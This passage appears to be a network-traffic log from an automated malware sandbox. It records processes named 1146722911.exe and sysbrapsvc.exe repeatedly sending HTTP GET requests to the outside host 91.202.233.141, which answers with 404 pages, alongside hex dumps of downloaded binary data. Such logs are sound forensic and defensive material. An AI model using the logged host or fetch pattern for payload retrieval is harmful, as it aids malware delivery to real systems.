87 c5 d8 f7 ce 18 [TRUNCATED]
                                                                              Data Ascii: MifOxyrErW3([1r<g?pR={e%2s5\s[YCb/>UWR':lCs,f})O%^w>/B1B?9snb(UqP+b@951)}q4sOfkSin)>|S/v5F 7HU6.C20q3C010|Z7U(o^x*JXyMz:#^E[q3L\?w5T_ZA#[jqUyG )1a]rbwlZQuafbnpn3,k#k!rqB9O8XY%pQfC8GDoyPyWo?!/nZzK|C[-EgEeGpwuyh%,5GjJP!mmHQr)oVJ<Wh#<"Tf+8}K4&sR'{nLgu9NYRs^sA7G2mI8Yj{*%aU=Xg&TRg&B5wiroW+8dlnrthwID&4P"T@Uj'E_rMzAl!F}fsunfb3#C4&@@G1 ioC,WAZw.d3!LsF= ?T{ R*M]V?:HK//|f"?6edfIM"3\Dys:yKhNFwY"oQtyFt9t:" [TRUNCATED]
                                                                              May 8, 2024 15:23:10.685863018 CEST1289INData Raw: fb 97 3d 42 70 69 f4 d0 6a d4 64 5d a9 23 47 e7 52 a7 c1 d7 43 8f cf 0d 5b 9a aa 34 1e 7a 10 5f ac 61 5b 0a 44 53 86 32 fc 6b 44 b6 49 0a c7 40 06 33 92 a6 5d 6c 1e 63 f7 06 96 6e 19 64 25 51 78 ac 38 7c 66 e1 8d 97 78 f2 9d 59 03 21 60 8e 4e 9a
                                                                              Data Ascii: =Bpijd]#GRC[4z_a[DS2kDI@3]lcnd%Qx8|fxY!`N5zm"@%hlTz?g4Da:2\iTe.AD$F=u<N<>L%Acf5"-+"Zhb'6Y-b<D0Hn6S#}2qV!jVe&yPyXC*
                                                                              May 8, 2024 15:23:10.685875893 CEST | 1289 | IN | Data Raw: 1a 46 bb ff b1 fa 98 44 c5 18 6c 9e 0d ec 06 f9 44 ad ac 14 68 8e 3c 37 c7 63 f7 ba f9 8e 1b 7d 54 ce d3 2c 5b d2 fc 55 f9 78 94 81 b2 1f a7 3a b6 3c ec 69 e6 35 7c 15 79 48 36 d9 9e 73 0a 15 67 8d 1f 32 00 43 7d f6 90 4e 5b d7 bf 3b 6d 8a c6 0d
                                                                              Data Ascii: FDlDh<7c}T,[Ux:<i5|yH6sg2C}N[;mPTHNCSQwcXpRwDF1[^3LTk6QgGt,C`bO?FE`;,fdBlJ1$z/AhCZTK~*KBK<}r5uJ^
                                                                              May 8, 2024 15:23:10.685889006 CEST | 1289 | IN | Data Raw: d6 7d f5 5f d9 ad a7 b3 48 ed 48 0f ed d0 a6 96 e0 05 f7 34 23 65 b6 2a 32 d5 2b 99 9e 59 e7 a9 c2 a3 a2 1e 4b aa 64 c1 ae 4e b8 34 7b 57 88 1d d0 92 ef 80 86 9d e5 82 de 2c 4b 34 03 65 a1 e8 4a ba 91 c0 a7 02 74 37 db ea aa 60 a0 a4 7a 12 0d 6d
                                                                              Data Ascii: }_HH4#e*2+YKdN4{W,K4eJt7`zmZ5UG?RN'Oio?b[AEvS&;=YFj"a_Y**'ih5T4DrE:o^D0C,cyxD~KlE,P/'mP~S
                                                                              May 8, 2024 15:23:10.685904980 CEST | 1289 | IN | Data Raw: 40 9d 2f 40 92 1d dc 2e 2d 37 07 95 c0 ca 27 b3 45 f9 db 57 cc 3c b3 94 3c 1c 6e a7 f9 03 68 03 f9 94 26 62 55 3d d2 84 91 a2 08 81 a0 cf 06 ad 0a 96 5d 18 4d 46 d5 71 52 28 c2 23 ad 04 c6 9e 13 96 5a df 9d 4a 31 8a 0d 44 89 cd 7a 9e 0a 4b af 79
                                                                              Data Ascii: @/@.-7'EW<<nh&bU=]MFqR(#ZJ1DzKyZ~s^V,j{OZ|4Mi{0X~xLSITC[H{X4obLUFSYCA[kW0ym9_"^^%D8RL4/!~=\MIDW.xtL<7QH2
                                                                              May 8, 2024 15:23:10.685919046 CEST | 1289 | IN | Data Raw: 44 4d a6 a3 b7 22 c2 5b 9f 42 16 aa a0 54 8e 79 60 78 63 27 93 c8 7b 4f 79 c4 39 e2 83 37 c6 3c 77 b6 6f c5 bd 55 c4 dd af 2f d6 8e 19 0b 89 c3 74 7c e8 62 ed 59 e0 3d f9 9f f6 a4 01 1a db e9 8e c3 a0 08 ab b1 db ce c5 be 6b 2e c1 21 3d 3b 72 f6
                                                                              Data Ascii: DM"[BTy`xc'{Oy97<woU/t|bY=k.!=;r\&q9C_SfNHUFANxjH{0FX#pyzcL(&5FGv@OJu$u;.:Kr3{Ys'~40.gW9-p
                                                                              May 8, 2024 15:23:10.685935020 CEST | 1289 | IN | Data Raw: 96 c7 1e 99 2a 65 47 5a 2f 04 61 95 c3 f7 3b 13 2d 1f 19 99 60 44 70 cc 71 89 26 ce fe 61 07 db 08 67 7b ef 72 66 48 9c 03 5c 52 eb 77 87 ba e0 6c 75 f8 82 5e 71 cc 4e 93 81 a7 97 ee d8 22 7d fd 87 70 04 2c 56 52 7b 5c c1 82 64 36 3b 23 11 5b 64
                                                                              Data Ascii: *eGZ/a;-`Dpq&ag{rfH\Rwlu^qN"}p,VR{\d6;#[dRuuo5h{.pQajc}hqR';C@{F#O8rlES06QI,W|<#wF%\3'J,|pi-]D
                                                                              May 8, 2024 15:23:10.685946941 CEST | 1289 | IN | Data Raw: ad 00 b0 d7 3a 66 4e 1e 03 44 ca 9a 69 86 81 3d 7b 3e 74 3d 11 a0 40 8a b0 4a ec 07 f1 39 3a c3 8a 08 fe 9a 04 56 91 cb 6e 0b b7 3d 71 77 1a ab 17 c8 b2 a1 13 f0 84 da c4 a6 3d 8b 0e b7 48 c2 70 8b 3d 79 0b 7b d0 83 40 bc 6e 63 e0 65 3c eb 92 7d
                                                                              Data Ascii: :fNDi={>t=@J9:Vn=qw=Hp=y{@nce<}K;m)2<+)}R|KG#Hp;+q-a+PG V(:2\%D#v_=Vcf~t*UszjG,Hj|kwD^J[2;
                                                                              May 8, 2024 15:23:10.685960054 CEST | 1289 | IN | Data Raw: 4a fc ac 2a f0 d4 7f 4b 5b 5e d3 b6 bb f2 53 4c 5a 65 a8 db fd c0 16 ef fa 31 99 22 f9 0c fc 39 a7 0a 63 e4 67 bf a5 a8 22 34 1f 1a 3e 8f 8b 2c 95 d1 b2 2f 63 fb d3 8c b1 e4 9b d3 5c f8 a4 85 be 1f 12 ae 72 d5 58 85 43 52 e6 38 c2 6f 80 6d 00 79
                                                                              Data Ascii: J*K[^SLZe1"9cg"4>,/c\rXCR8omy*DoBpxA|l;)/m:O[]n&A=+a#c7vC#c&UQXZa.J_ana^-:V:jdx+.<K="uR`*2SY
                                                                              May 8, 2024 15:23:10.685971022 CEST | 184 | IN | Data Raw: 62 6b e6 21 ab a9 eb e8 9e 02 55 78 11 38 01 35 39 77 e9 44 37 e2 1d f0 1e a9 4c 4a ab 33 4c eb 41 0e 7e b2 f2 cb 7b c4 d9 0a 53 01 ea 34 e0 60 75 f2 6c 58 bc 8e db 3d 9d 02 23 ac bf af 98 e0 41 25 68 5a 3d a9 69 92 af 5f 51 c7 ca 1d de fa 66 d1
                                                                              Data Ascii: bk!Ux859wD7LJ3LA~{S4`ulX=#A%hZ=i_Qf]J`7LO/6o.?n-;K/:W$[G}coB%9lA=Nj@E_*+q{@:'W1pfe


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              13 | 192.168.2.8 | 49726 | 91.202.233.141 | 80 | 2060 | C:\Users\user\AppData\Local\Temp\1146722911.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:23:12.927995920 CEST | 167 | OUT | GET /_1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:13.280214071 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:13 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:23:15.325579882 CEST | 167 | OUT | GET /_2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:15.675209045 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:15 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:23:18.033548117 CEST | 167 | OUT | GET /_3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:18.382745028 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:18 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              14 | 192.168.2.8 | 49727 | 91.202.233.141 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:23:18.379914999 CEST | 166 | OUT | GET /1 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:18.725898027 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:18 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                              May 8, 2024 15:23:20.747984886 CEST | 166 | OUT | GET /2 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:21.096507072 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:20 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              15 | 192.168.2.8 | 49729 | 91.202.233.141 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:23:23.477629900 CEST | 166 | OUT | GET /3 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:23.832170963 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:23 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              16 | 192.168.2.8 | 49730 | 91.202.233.141 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:23:26.216587067 CEST | 166 | OUT | GET /4 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:26.571116924 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:26 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                              17 | 192.168.2.8 | 49732 | 91.202.233.141 | 80 | 5588 | C:\Windows\sysbrapsvc.exe
                                                                              Timestamp | Bytes transferred | Direction | Data
                                                                              May 8, 2024 15:23:28.960473061 CEST | 166 | OUT | GET /5 HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
                                                                              Host: 91.202.233.141
                                                                              May 8, 2024 15:23:29.309212923 CEST | 728 | IN | HTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0 (Ubuntu)
                                                                              Date: Wed, 08 May 2024 13:23:29 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 564
                                                                              Connection: keep-alive
                                                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 [TRUNCATED]
                                                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
